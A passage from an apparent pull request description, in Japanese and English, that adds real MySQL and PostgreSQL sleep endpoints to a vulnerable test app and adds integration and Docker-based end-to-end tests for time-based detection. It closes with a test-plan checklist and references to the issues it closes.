   - `testenv/vulnapp/main.go`: `/mysql/sleep`, `/pg/sleep`（実 MySQL/PostgreSQL SLEEP）
4. **統合テスト + E2E テスト**
   - `TestIntegration_TimeBased_MySQL/PostgreSQL` – VulnServer 実 sleep で検証
   - `TestE2E_TimeBased_MySQL/PostgreSQL` – Docker 環境で実行（`make e2e`）

## Test plan

- [ ] `go test ./internal/...` がすべて PASS
- [ ] `make e2e` (Docker 起動後) で E2E テストが PASS

Closes #29
Closes #30